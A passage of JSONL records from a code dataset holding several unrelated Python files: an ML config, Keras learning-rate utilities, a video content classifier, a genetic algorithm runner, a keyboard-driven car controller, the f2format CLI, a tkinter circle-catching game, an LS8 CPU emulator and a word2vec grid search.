'chart.txt',\n 'GO-BPlist.txt',\n 'all_target.txt',\n '6_ppi.net',\n '6_ppi.node',\n 'inter-targetShortestPathLength.matrix',\n 'CN.node',\n 'Cancer_Network.net',\n 'Pathway-Target-Matrix.txt',\n 'Gene-GeneInteraction.csv',\n 'Pathway.txt',\n 'Pathway-Target-Matrix.uniprot.txt',\n '26PositiveLabel.txt',\n 'Dis.matrix',\n 'DCI.matrix',\n 'Eff.Degree.matrix',\n 'Eff.Betweenness.matrix',\n 'Eff.Evcent.matrix',\n 'MP.U.matrix']\n\n# DOWNLOAD_FILENAME = 'test.txt'\nDOWNLOAD_FILENAME = '00Result_Rank.txt'\nDOWNLOAD_DIR = '/home/sse/Desktop/data/'\nFILENAME = 'datafiles'\n\n# JOB_START_URL = 'http://localhost:8000/test'\n# JOB_STOP_URL = 'http://localhost:8000/test'\nJOB_START_URL = 'http://localhost:4000/job/start'\nJOB_STOP_URL = 'http://localhost:4000/job/stop'\n\nJOB_STATUS_SUCCESS = 0\nJOB_STATUS_FAILED = 1\nJOB_STATUS_RUNNING = 2\nJOB_STATUS_STOP = 3\n\nRESPONSE_STATUS_ERROR = 1\n\njob_status = JOB_STATUS_SUCCESS\nupload_success = False\n","sub_path":"main_app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"436511585","text":"\"\"\"\nUtilty code for constructing optimizers and scheduling learning rates.\n\"\"\"\n\n# System\nimport math\nfrom functools import partial\n\n# Externals\nfrom tensorflow import keras\nimport horovod.tensorflow.keras as hvd\n\ndef _lr_schedule(epoch, base_lr, peak_lr, n_warmup_epochs, decay_schedule={}):\n \"\"\"Learning rate schedule function.\n\n Gives the learning rate as a function of epoch according to\n additional settings:\n base_lr: baseline unscaled learning rate at beginning of training.\n peak_lr: scaled learning at end of warmup period\n n_warmup_epochs: number of linear warmup epochs\n decay_schedule: a dict of epoch number -> decay factor\n \"\"\"\n # Linear LR warmup\n if epoch < n_warmup_epochs:\n return epoch * (peak_lr - base_lr) / n_warmup_epochs + base_lr\n else:\n # Find the most recent decay factor\n decay_factor = 1.\n decay_epoch = 0\n for e, d in decay_schedule.items():\n if e >= decay_epoch and e < epoch:\n decay_epoch, decay_factor = e, d\n return peak_lr * decay_factor\n\ndef get_lr_schedule(base_lr, global_batch_size, base_batch_size=None,\n scaling=None, n_warmup_epochs=0, decay_schedule={}):\n \"\"\"Get the learning rate schedule function\"\"\"\n if scaling == 'linear':\n peak_lr = base_lr * global_batch_size / base_batch_size\n elif scaling == 'sqrt':\n peak_lr = base_lr * math.sqrt(global_batch_size / base_batch_size)\n else:\n peak_lr = base_lr\n return partial(_lr_schedule, base_lr=base_lr, peak_lr=peak_lr,\n n_warmup_epochs=n_warmup_epochs,\n decay_schedule=decay_schedule)\n\ndef get_optimizer(name, distributed=False, **opt_args):\n #lr, lr_scaling='linear', n_ranks=1,\n \"\"\"Configure the optimizer\"\"\"\n\n # Construct the optimizer\n OptType = getattr(keras.optimizers, name)\n opt = OptType(**opt_args)\n\n # Distributed optimizer wrapper\n if distributed:\n opt = hvd.DistributedOptimizer(opt)\n\n return opt\n","sub_path":"utils/optimizers.py","file_name":"optimizers.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"379613979","text":"# py classifier_video.py --video C:/Users/anlan/OneDrive/Desktop/1.mp4\nimport keras\nimport numpy as np\nimport cv2\nimport argparse\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--video\", required = True,\n\thelp = \"Path to the image to be scanned\")\nargs = vars(ap.parse_args())\n\n\ndef load_images(image_paths, image_size):\n loaded_images = []\n loaded_image_paths = []\n cap =cv2.VideoCapture(image_paths)\n i = 0\n while True:\n i += 1\n ret,frame = cap.read()\n if ret:\n if i % 28 == 0: #sau mỗi 28 frame hình thì sẽ lấy 1 hình đưa vào array\n image = cv2.resize(frame,(256, 256)) # resize image\n image = image/255.0 # chuẩn hóa dữ liệu về dạng 0 va 1\n loaded_images.append(image)\n loaded_image_paths.append(image_paths) \n else:\n break \n return np.asarray(loaded_images), loaded_image_paths\n\nclass Classifier():\n nsfw_model = None\n def __init__(self, model_path):\n Classifier.nsfw_model = keras.models.load_model(model_path)\n\n def classify(self, image_paths = \"\", batch_size = 32, image_size = (256, 256), categories = ['unsafe', 'safe']):\n loaded_images, loaded_image_paths = load_images(image_paths, image_size) \n if not loaded_image_paths:\n return {}\n model_preds = Classifier.nsfw_model.predict(loaded_images, batch_size = batch_size) #predict 1 array image \n images_preds = np.average(model_preds, axis = 0) #lấy trung bình theo cột\n return images_preds\n\n\nif __name__ == '__main__':\n weights_path = \"classifier_model\"\n m = Classifier(weights_path)\n result = m.classify(args[\"video\"])\n # result = m.classify(\"C:/Users/anlan/OneDrive/Desktop/1.mp4\")\n if result[0] > result[1]:\n print(\"toxic\")\n else: print(\"no toxic\")\n\n# {'safe': 0.01849486, 'unsafe': 0.9815051}}\n\n'''\nmodel_preds [[0.00747683 0.99252313]\n [0.00745127 0.9925487 ]\n [0.00669979 0.9933002 ]\n [0.00798242 0.9920176 ]\n [0.00657054 0.9934295 ]\n [0.00708546 0.99291456]\n [0.0066964 0.9933036 ]\n [0.00737985 0.99262017]\n [0.00903959 0.9909604 ]\n [0.0084687 0.9915314 ]\n [0.00824533 0.99175465]\n [0.00807763 0.9919224 ]\n [0.00616169 0.99383837]\n [0.00741947 0.99258053]\n [0.00708305 0.99291694]\n [0.00617239 0.99382764]\n]\n'''","sub_path":"detect_toxic_image_and_video/classifier_video.py","file_name":"classifier_video.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"405869340","text":"from statistics import mean\nfrom timeit import default_timer as timer\nfrom lib.GeneticAlgoAPI import Population\n\n\ndef get_time_units(time):\n \"\"\" time is in seconds \"\"\"\n unit = \"seconds\"\n if time <= 1e-1:\n time *= 1e3\n unit = \"milliseconds\"\n elif time > 60:\n time /= 60\n unit = \"minutes\"\n if time > 60:\n time /= 60\n unit = \"hours\"\n return time, unit\n\n\ndef evaluate(population, gen, ga):\n fittest = population.get_fittest()\n f = fittest.get_fitness()\n m = mean(ch.get_fitness() for ch in population)\n print(\"gen: {} fit: {} mean: {:.2f} chromo: {}\".format(str(gen), f, m, str(fittest)))\n # print(\"generation: {}, best score: {}, mean score: {:.2f}, chromosome: {}\".format(str(gen), f, m, str(fittest)))\n # print(\"gen: {} fit: {}\".format(str(gen), ga.max_score))\n\n\ndef run(ga, population, early_conv_avoid):\n start = timer()\n\n early_conv_avoid.before_start(ga)\n ga.set_fitness_scores(population)\n gen = 0\n evaluate(population, gen, ga)\n while not ga.get_stop_cond(population):\n gen += 1\n early_conv_avoid.start_generation(gen, ga, population)\n\n # print(1)\n elite = ga.apply_elitism(population)\n # print(2)\n parents = ga.selection(population)\n # print(3)\n population = ga.crossover(parents, population.get_size())\n # print(4)\n population = ga.mutation(population)\n # print(5)\n population.add_chromosome(elite)\n # print(6)\n ga.set_fitness_scores(population)\n\n evaluate(population, gen, ga)\n\n # deal with early convergence\n early_conv_avoid.end_generation(gen, ga, population)\n\n end = timer()\n return end - start, population.get_fittest(), gen\n\n\ndef build_and_run(early_conv_avoid, mutation_rate, crossover_rate, population_size, elitism_count, ga_type, chromo_type):\n ga = ga_type(elitism_count, mutation_rate, crossover_rate, population_size)\n population = Population()\n population.init_population(population_size, chromo_type)\n\n print(ga)\n print(early_conv_avoid)\n return run(ga, population, early_conv_avoid)\n\n","sub_path":"ex2/lib/GeneticAlgoAPI/run_ga.py","file_name":"run_ga.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"331737050","text":"import signal\nimport sys\nimport time\nimport _thread\nfrom platform_modules.motor_controller import MotorController\nfrom platform_modules.lcd_driver import LCD\nfrom platform_modules.button_reader import ButtonReader\nfrom platform_modules.car_guard import CarGuard\nfrom platform_modules.camera import Camera\nfrom utils.keyboard_getch import _Getch\nimport global_storage as gs\nimport config as cf\n\n\n# Init camera\ncamera = Camera()\ncamera.start()\n\n# Init LCD\nlcd = LCD(cf.LCD_ADDRESS)\n\n# Init button reader\nbutton_reader = ButtonReader()\nbutton_reader.start()\n\n# Init motor controller\nmotor_controller = MotorController()\nmotor_controller.start()\n\n# Car guard\n# Stop car when hitting obstacle or when user presses button 4\nguard = CarGuard()\nguard.start()\n\n# UI thread\ndef ui_thread():\n # Save last value of buttons\n last_button_1 = False\n last_button_2 = False\n last_button_3 = False\n last_button_4 = False\n last_button_ss1 = False\n last_button_ss2 = False\n last_time_update_screen = time.time()\n\n while True:\n # Determine pressed buttons\n pressed_buttons = []\n if gs.button_1 and not last_button_1:\n pressed_buttons.append(\"1\")\n if gs.button_2 and not last_button_2:\n pressed_buttons.append(\"2\")\n if gs.button_3 and not last_button_3:\n pressed_buttons.append(\"3\")\n if gs.button_4 and not last_button_4:\n pressed_buttons.append(\"4\")\n if gs.button_ss1 and not last_button_ss1:\n pressed_buttons.append(\"S1\")\n if gs.button_ss2 and not last_button_ss2:\n pressed_buttons.append(\"S2\")\n\n if any([s for s in pressed_buttons if \"1\" == s]):\n gs.record_videos = not gs.record_videos\n\n if any([s for s in pressed_buttons if \"3\" == s]):\n gs.emergency_stop = False\n\n if time.time() - last_time_update_screen > 1:\n lcd.lcd_clear()\n lcd.lcd_display_string(\"Manual mode:\", 1)\n lcd.lcd_display_string(\"1:RECORD,4:STOP\", 2)\n \n if gs.emergency_stop:\n lcd.lcd_display_string(\"EMERGENCY!!!\", 4)\n\n if gs.record_videos:\n lcd.lcd_display_string(\"[.] Recording...\", 3)\n\n last_time_update_screen = time.time()\n\n # Update values\n last_button_1 = gs.button_1\n last_button_2 = gs.button_2\n last_button_3 = gs.button_3\n last_button_4 = gs.button_4\n last_button_ss1 = gs.button_ss1\n last_button_ss2 = gs.button_ss2\n \n time.sleep(0.2)\n\n_thread.start_new_thread(ui_thread, ())\n\n# Manual control using keyboard\ngetch = _Getch()\nprint(\"Use keyboard to control: wasd\")\nprint(\"Quit: q\")\nwhile not gs.exit_signal:\n key = getch()\n if key == \"w\":\n if gs.speed < 0:\n gs.speed = 0\n else:\n gs.speed = min(cf.MAX_SPEED, gs.speed + 2)\n elif key == \"s\":\n if gs.speed > 0:\n gs.speed = 0\n else:\n gs.speed = max(-cf.MAX_SPEED, gs.speed - 2)\n elif key == \"a\":\n if gs.steer > 0:\n gs.steer = 0\n else:\n gs.steer = max(cf.MIN_ANGLE, gs.steer - 5)\n elif key == \"d\":\n if gs.steer < 0:\n gs.steer = 0\n else:\n gs.steer = min(cf.MAX_ANGLE, gs.steer + 5)\n elif key == \"i\": # Remove emergency stop state\n gs.emergency_stop = False\n elif key == \"v\":\n gs.record_videos = not gs.record_videos\n print(\"Record video: \" + str(gs.record_videos))\n elif key == \"q\":\n gs.exit_signal = True\n break\n\n print(\"Speed: {} Steer: {}\".format(gs.speed, gs.steer))\n\n# camera.join()\n# motor_controller.join()\n# guard.join()\n# button_reader.join()\n# remote_controller.join()\n","sub_path":"run_manual_control_keyboard.py","file_name":"run_manual_control_keyboard.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"504705791","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport locale\nimport os\nimport shutil\nimport sys\nimport uuid\n\nfrom f2format.core import f2format\n\n# multiprocessing may not be supported\ntry: # try first\n import multiprocessing\nexcept ImportError:\n multiprocessing = None\nelse: # CPU number if multiprocessing supported\n if os.name == 'posix' and 'SC_NPROCESSORS_CONF' in os.sysconf_names:\n CPU_CNT = os.sysconf('SC_NPROCESSORS_CONF')\n elif 'sched_getaffinity' in os.__all__:\n CPU_CNT = len(os.sched_getaffinity(0)) # pylint: disable=E1101\n else:\n CPU_CNT = os.cpu_count() or 1\nfinally: # alias and aftermath\n mp = multiprocessing\n del multiprocessing\n\n# backport compatibility\ntry:\n import pathlib2 as pathlib\nexcept ImportError:\n import pathlib\n\n# version string\n__version__ = '0.4.0.post2'\n\n# macros\n__cwd__ = os.getcwd()\n__archive__ = os.path.join(__cwd__, 'archive')\n__encoding__ = locale.getpreferredencoding()\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(prog='f2format',\n usage='f2format [options] ',\n description='Convert f-string to str.format for Python 3 compatibility.')\n parser.add_argument('-V', '--version', action='version', version=__version__)\n\n archive_group = parser.add_argument_group(title='archive options',\n description=\"duplicate original files in case there's any issue\")\n archive_group.add_argument('-n', '--no-archive', action='store_true',\n help='do not archive original files')\n archive_group.add_argument('-p', '--archive-path', action='store', default=__archive__, metavar='PATH',\n help='path to archive original files (default is %r)' % __archive__)\n\n convert_group = parser.add_argument_group(title='convert options',\n description='compatibility configuration for none-unicode files')\n convert_group.add_argument('-c', '--encoding', action='store', default=__encoding__, metavar='CODING',\n help='encoding to open source files (default is %r)' % __encoding__)\n\n parser.add_argument('file', nargs='*', metavar='SOURCE', default=__cwd__,\n help='python source files and folders to be converted (default is %r)' % __cwd__)\n\n return parser\n\n\ndef main():\n \"\"\"Entry point for f2format.\"\"\"\n parser = get_parser()\n args = parser.parse_args()\n\n # set up variables\n ARCHIVE = args.archive_path\n archive = (not args.no_archive)\n os.environ['F2FORMAT_ENCODING'] = args.encoding\n\n def find(root):\n \"\"\"Recursively find all files under root.\"\"\"\n flst = list()\n temp = os.listdir(root)\n for file in temp:\n path = os.path.join(root, file)\n if os.path.isdir(path):\n flst.extend(find(path))\n elif os.path.isfile(path):\n flst.append(path)\n elif os.path.islink(path): # exclude symbolic links\n continue\n yield from flst\n\n def rename(path):\n stem, ext = os.path.splitext(path)\n name = '%s-%s%s' % (stem, uuid.uuid4(), ext)\n return os.path.join(ARCHIVE, name)\n\n # make archive directory\n if archive:\n pathlib.Path(ARCHIVE).mkdir(parents=True, exist_ok=True)\n\n # fetch file list\n filelist = list()\n for path in sys.argv[1:]:\n if os.path.isfile(path):\n if archive:\n dest = rename(path)\n pathlib.Path(dest).parent.mkdir(parents=True, exist_ok=True)\n shutil.copy(path, dest)\n filelist.append(path)\n if os.path.isdir(path):\n if archive:\n shutil.copytree(path, rename(path))\n filelist.extend(find(path))\n\n # check if file is Python source code\n def ispy(file): return (os.path.isfile(file) and (os.path.splitext(file)[1] in ('.py', '.pyw')))\n filelist = set(filter(ispy, filelist))\n\n # if no file supplied\n if len(filelist) == 0:\n parser.error('argument PATH: no valid source file found')\n\n # process files\n if mp is None:\n [f2format(filename) for filename in filelist]\n else:\n mp.Pool(processes=CPU_CNT).map(f2format, filelist)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"src/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"554876164","text":"from tkinter import *\nfrom tkinter.messagebox import *\nfrom time import *\n\n\nclass Naughty_circle:\n def __init__(self, t, root, canvas, canvas_width, canvas_height):\n self.start_time = t\n self.root = root\n self.canvas = canvas\n self.canvas_width = canvas_width\n self.canvas_height = canvas_height\n self.x = canvas_width/2 - 25\n self.y = canvas_height/2 - 25\n self.length = 50\n self.oval = self.canvas.create_oval(self.x, self.y, self.x + self.length, self.y + self.length, fill='blue')\n\n def move(self, x_velocity, y_velocity):\n self.x += x_velocity\n self.y += y_velocity\n self.canvas.move(self.oval, x_velocity, y_velocity)\n\n def motion(self, event):\n x, y = event.x, event.y\n gap = 20\n value = 0\n if self.x - gap <= x <= self.x and self.y <= y <= self.y + self.length: # horizontal right\n self.move(15, 0)\n if self.x + self.length <= x <= self.x + self.length + gap and self.y <= y <= self.y + self.length: # horizontal left\n self.move(-15, 0)\n if self.y - gap - 10 <= y <= self.y and self.x <= x <= self.x + self.length: # vertical down\n self.move(0, 15)\n if self.y + self.length <= y <= self.y + self.length + gap and self.x <= x <= self.x + self.length: # vertical up\n self.move(0, -15)\n if self.x - gap <= x <= self.x and self.y - gap - 10 <= y <= self.y: # diagonal down right\n self.move(15, 15)\n if self.x - gap <= x <= self.x and self.y + self.length <= y <= self.y + self.length + gap: # diagonal up right\n self.move(15, -15)\n if self.x + self.length <= x <= self.x + self.length + gap and self.y - gap - 10 <= y <= self.y: # diagonal down left\n self.move(-15, 15)\n if self.x + self.length <= x <= self.x + self.length + gap and self.y + self.length <= y <= self.y + self.length + gap: # diagonal up left\n self.move(-15, -15)\n if self.x + self.length <= 0: # if reach left border\n self.move(self.canvas_width, 0)\n if self.x >= self.canvas_width: # if reach right border\n self.move(-self.canvas_width, 0)\n if self.y + self.length <= 0: # if reach top border\n self.move(0, self.canvas_height)\n if self.y >= self.canvas_height: # if reach bottom border\n self.move(0, -self.canvas_height)\n if self.x <= x <= self.x + self.length and self.y <= y <= self.y + self.length: # if player manage to control mouse cursor to reach circle\n duration = time() - self.start_time\n if duration >= 60:\n showinfo(\"Greetings from above\", \"Congratulations, beloved user, you just spent \" + \"%.1f\" % (duration/60) + \" minutes on catching a circle!\\nHere's a hug ... lonely f#$%\")\n else:\n showinfo(\"Greetings from above\", \"Congratulations, beloved user, you just spent \" + \"%.1f\" % duration + \" seconds on catching a circle!\\nHere's a hug ... lonely f#$%\")\n self.root.destroy()\n\n\nclass Arena:\n def __init__(self):\n self.t = time()\n self.root = Tk()\n self.root.wm_title(\"Catch the circle\")\n self.width = 600\n self.height = 600\n self.canvas = Canvas(self.root, width=self.width, height=self.height)\n self.canvas.pack()\n self.canvas.focus_set()\n self.canvas.create_rectangle(0, 0, self.width, self.height, fill='white') # background\n self.conscious_circle()\n self.root.update()\n self.root.mainloop()\n\n def conscious_circle(self):\n circle = Naughty_circle(self.t, self.root, self.canvas, self.width, self.height)\n self.canvas.bind('', circle.motion)\n\nArena()","sub_path":"Random Program/Self-conscious Circle/Naughty_circle.py","file_name":"Naughty_circle.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"83997828","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n self.ram = [0] * 256 # Holds 256 bytes of memory \n self.reg = [0] * 8 # Holds 8 general-purpose registers\n self.pc = 0 # Program Counter, address of the currently executing instruction\n self.ldi = 0b10000010\n self.prn = 0b01000111\n self.hlt = 0b00000001\n self.mul = 0b10100010\n self.add = 0b10100000\n self.push = 0b01000101\n self.pop = 0b01000110\n self.call = 0b01010000\n self.ret = 0b00010001\n self.cmp = 0b10100111\n self.jmp = 0b01010100\n self.jeq = 0b01010101\n self.jne = 0b01010110\n self.running = True\n self.branchtable = {\n self.ldi: self.handle_load_immediate,\n self.prn: self.handle_print,\n self.hlt: self.handle_halt,\n self.mul: self.handle_multiply,\n self.push: self.handle_push,\n self.pop: self.handle_pop,\n self.call: self.handle_call,\n self.ret: self.handle_return,\n self.add: self.handle_add,\n self.cmp: self.handle_compare,\n self.jmp: self.handle_jump,\n self.jeq: self.handle_jeq,\n self.jne: self.handle_jne\n }\n self.sp = 7 # Stack Pointer\n self.reg[self.sp] = 0xFF # Used to keep register values between 0-255\n self.flag = 0 # FL bits: 00000LGE\n \n\n \n def load(self, file):\n \"\"\"Load a program into memory.\"\"\"\n\n address = 0\n \n program = open(file, \"r\")\n \n for line in program:\n line = line.split(\"#\")\n line = line[0].strip()\n if line == \"\":\n continue\n self.ram[address] = int(line, 2)\n address += 1\n \n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n if op == \"ADD\":\n self.reg[reg_a] += self.reg[reg_b]\n elif op == \"MUL\":\n self.reg[reg_a] *= self.reg[reg_b]\n elif op == \"SUB\":\n self.reg[reg_a] -= self.reg[reg_b]\n elif op == \"DIV\":\n self.reg[reg_a] /= self.reg[reg_b]\n elif op == \"CMP\":\n if self.reg[reg_a] == self.reg[reg_b]:\n # Set E Flag to 1: 00000001\n self.flag = 1\n elif self.reg[reg_a] < self.reg[reg_b]:\n # Set L Flag to 1: 00000100\n self.flag = 4\n elif self.reg[reg_a] > self.reg[reg_b]:\n # Set G Flag to 1: 00000010\n self.flag = 2\n else:\n self.flag = 0\n else:\n raise Exception(\"Unsupported ALU operation\")\n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n #self.fl,\n #self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n\n print()\n \n def ram_read(self, mar):\n # Memory Address Register (MAR): holds the memory address we're reading or writing\n return self.ram[mar]\n \n def ram_write(self, mar, mdr):\n # Memory Data Register (mdr), holds the value to write or the value just read\n self.ram[mar] = mdr\n\n def handle_load_immediate(self):\n # Handles intructions\n operand_a = self.ram_read(self.pc+1)\n operand_b = self.ram_read(self.pc+2)\n self.reg[operand_a] = operand_b\n self.pc += 3\n \n def handle_print(self):\n # Handles print\n operand_a = self.ram_read(self.pc+1)\n print(self.reg[operand_a])\n self.pc += 2\n \n def handle_halt(self):\n # Stops program\n self.running = False\n \n def handle_multiply(self):\n # Multiplies\n operand_a = self.ram_read(self.pc+1)\n operand_b = self.ram_read(self.pc+2)\n self.alu(\"MUL\", operand_a, operand_b)\n \n self.pc += 3\n \n def handle_add(self):\n operand_a = self.ram_read(self.pc+1)\n operand_b = self.ram_read(self.pc+2)\n self.alu(\"ADD\", operand_a, operand_b)\n \n self.pc += 3\n \n def handle_push(self):\n # Decrement stack pointer\n self.reg[self.sp] -= 1\n \n # Copies value from register into memory\n reg_num = self.ram[self.pc+1]\n value = self.reg[reg_num] # Being pushed\n \n address = self.reg[self.sp]\n \n # Stores the value on the stack\n self.ram[address] = value\n \n self.pc += 2\n \n def handle_pop(self):\n address = self.reg[self.sp]\n value = self.ram[address]\n \n # Copies value from memory into register\n reg_num = self.ram[self.pc+1]\n self.reg[reg_num] = value # Being popped off of stack\n \n # Increment stack pointer\n self.reg[self.sp] += 1\n \n self.pc += 2\n \n def handle_call(self):\n # Computes return address\n return_address = self.pc+2\n \n # Pushes to stack\n self.reg[self.sp] -= 1\n self.ram[self.reg[self.sp]] = return_address\n \n # Sets program counter to the value in the given register\n register_number = self.ram[self.pc+1]\n destination_address = self.reg[register_number]\n \n self.pc = destination_address\n \n # print(\"REG\", self.reg)\n # print(\"RAM\", self.ram)\n # print(\"SP\", self.sp)\n # print(\"Return address\", return_address)\n # print(\"register_number\", register_number)\n # print(\"destination_address\", destination_address)\n \n def handle_return(self):\n # Pop returns address from top of stack\n return_address = self.ram[self.reg[self.pc]]\n print(\"return\",return_address)\n self.reg[self.sp] += 1\n \n # Sets program counter\n self.pc = return_address\n \n print(\"REG\", self.reg)\n print(\"RAM\", self.ram)\n print(\"SP\", self.sp)\n print(\"Return address\", return_address)\n # print(\"register_number\", register_number)\n # print(\"destination_address\", destination_address)\n \n def handle_compare(self):\n operand_a = self.ram_read(self.pc+1)\n operand_b = self.ram_read(self.pc+2)\n \n self.alu(\"CMP\", operand_a, operand_b)\n \n self.pc += 3\n \n def handle_jump(self):\n # Jump to the address stored in the given register\n operand_a = self.ram_read(self.pc+1)\n address = self.reg[operand_a]\n \n # Set the program counter the address stored in the given register\n self.pc = address\n \n def handle_jeq(self):\n # If equal (E) flag is set to true (1)\n if self.flag == 1:\n # Jump to the address stored in the given register\n self.handle_jump()\n \n else:\n self.pc += 2\n \n def handle_jne(self):\n # If E flag is clear (false, 0)\n # How to clear bit flag: x & ~y\n # &: Each bit of the output is 1 if the corresponding bit of x AND of y is 1, otherwise it's 0. \n # ~: Switches each 1 for a 0 and each 0 for a 1.\n if self.flag & ~1:\n # jump to the address stored in the given register.\n self.handle_jump()\n else:\n self.pc += 2\n \n def run(self):\n \"\"\"Run the CPU.\"\"\"\n\n while self.running:\n # Instruction Register\n ir = self.ram_read(self.pc)\n \n if self.branchtable.get(ir):\n self.branchtable[ir]()\n else:\n print(\"Unknown instructions\")\n sys.exit(1)\n \n #self.trace()","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":8081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"581357088","text":"from gensim.models import Word2Vec\nfrom gensim.models.callbacks import CallbackAny2Vec\nfrom gensim.test.utils import get_tmpfile\nfrom gensim.models.word2vec import LineSentence\nimport nltk\nfrom tqdm import tqdm\nimport os\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.base import BaseEstimator\nimport scipy\nimport numpy as np\nimport itertools\nimport pandas as pd\nfrom sklearn.model_selection import ParameterGrid\nimport json\n\n\nclass EpochSaver(CallbackAny2Vec):\n '''Callback to save model after each epoch.'''\n\n def __init__(self, path_prefix):\n self.path_prefix = path_prefix\n self.epoch = 0\n os.makedirs(self.path_prefix, exist_ok=True)\n\n def on_epoch_end(self, model):\n savepath = get_tmpfile(\n '{}_epoch{}.model'.format(self.path_prefix, self.epoch)\n )\n model.save(savepath)\n print(\n \"Epoch saved: {}\".format(self.epoch + 1),\n \"Starting next epoch\"\n )\n self.epoch += 1\n\ndef senseEmbeddings(word, dictionary):\n '''returns the sense embeddings for a given word'''\n\n word = word.split()\n word = \"_\".join(word) if len(word)>1 else word[0]\n senses = []\n\n for w in dictionary:\n wordC = \"_\".join(w.split(\":\")[0].split(\"_\")[:-1])\n if word.lower() == wordC.lower():\n senses.append(w)\n\n return senses\n\ndef wordSimilarity(w1, w2, dictionary, model):\n '''take two words and outputs a score of their similarity'''\n\n w1_senses = senseEmbeddings(w1, dictionary)\n w2_senses = senseEmbeddings(w2, dictionary)\n score = - 1.0\n\n if len(w1_senses)!=0 and len(w2_senses)!=0:\n combinations = itertools.product(w1_senses, w2_senses)\n for s1, s2 in combinations:\n score = max(score, model.wv.similarity(s1, s2))\n\n return score\n\nclass Word2VecModel(BaseEstimator):\n '''hyperparamter grid search'''\n def __init__(self, window=5, min_count=3, size=400, alpha=0.01, sample = 1e-5, negative=9, epochs = 15):\n self.w2v_model = None\n self.window = window\n self.min_count = min_count\n self.size = size\n self.alpha = alpha\n self.sample = sample\n self.epochs = epochs\n self.negative = negative\n\n def fit(self, data):\n '''model training'''\n # Initialize model\n self.w2v_model = Word2Vec(size=self.size,\n window=self.window,\n alpha=self.alpha,\n min_count = self.min_count,\n workers = 8,\n sample = self.sample,\n sg = 1)\n # Build vocabulary\n self.w2v_model.build_vocab(data)\n\n self.w2v_model.save(\"../resources/word2vec_final_lower_skip.model\")\n\n # Train model\n self.w2v_model.train(sentences = data,\n total_examples=self.w2v_model.corpus_count,\n epochs=self.epochs,\n callbacks = [EpochSaver(\"./checkpoints\")])\n self.w2v_model.wv.save_word2vec_format('../resources/embeddings_final_lower_skip.vec', binary=False)\n return self\n\n def score(self, gold):\n '''scoring function based on word similarity resulting in a correlation score'''\n vocab = self.w2v_model.wv.vocab\n dictionary = list(vocab.keys())\n gold['cosine'] = gold.apply(lambda row: wordSimilarity(row['Word 1'],\n row['Word 2'],\n dictionary,\n self.w2v_model),axis=1)\n\n correlation_2, p2 = scipy.stats.spearmanr(gold['Human (mean)'], gold['cosine'])\n return correlation_2\n\n\ndef GridSearch(hyperparameters, corpora):\n '''performs a grid search operation and returns the best hyperparamters based on a correlation score'''\n best_score = - 1\n gold = pd.read_csv('../dataset/combined.tab', delimiter = '\\t')\n grid = ParameterGrid(hyperparameters)\n best_grid = None\n print(\"number of combinations: {}\\n\".format(len(list(grid))))\n\n grids = []\n for current_grid in tqdm(grid):\n #model\n current_model = Word2VecModel(**current_grid)\n current_model.fit(corpora)\n current_score = current_model.score(gold)\n del current_model\n\n #updating and writing\n current_grid.update({\"correlation:\":current_score})\n grids.append(current_grid)\n\n print(current_grid)\n\n if current_score > best_score:\n print(\"better: \", current_score)\n best_score = current_score\n best_grid = current_grid\n\n return best_grid, grids\nhyperparameters = {'window' : [4, 5],\n 'min_count' : [1, 3],\n 'size' : [100, 300],\n 'negative':[13],\n 'alpha' : [0.09, 0.001],\n 'epochs': [50]}\n\nfinal_hyperparameters = {'window' : [5],\n 'min_count' : [3],\n 'size' : [100],\n 'negative':[13],\n 'alpha' : [0.09],\n 'epochs': [50]}\n\nif __name__ == '__main__':\n path_to_corpus = '../dataset/code_embedding/.txt'\n\n #load\n sentences = LineSentence(path_to_corpus)\n\n #search and train\n best_grid, grids = GridSearch(final_hyperparameters, sentences)\n\n #saving, comment for final hyperparamters\n # with open(\"../resources/gridsearch7.json\", 'w') as f1:\n # for grid in grids:\n # json.dump(grid, f1)\n\n print(\"GridSearch complete: \", best_grid)\n","sub_path":"embedding_algorithms/sensEmbedd_1/code/grid_search.py","file_name":"grid_search.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"554382939","text":"import os\nimport sys\nimport logging\nimport sqlalchemy\nimport rollbar\nfrom pythonjsonlogger import jsonlogger\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom newrelic.agent import initialize as newrelic_initialize\n\n\ndef handle_exception(exc_type, exc_value, exc_traceback):\n logging.exception({\n \"message\": \"caught_exception\",\n \"exc_type\": exc_type,\n 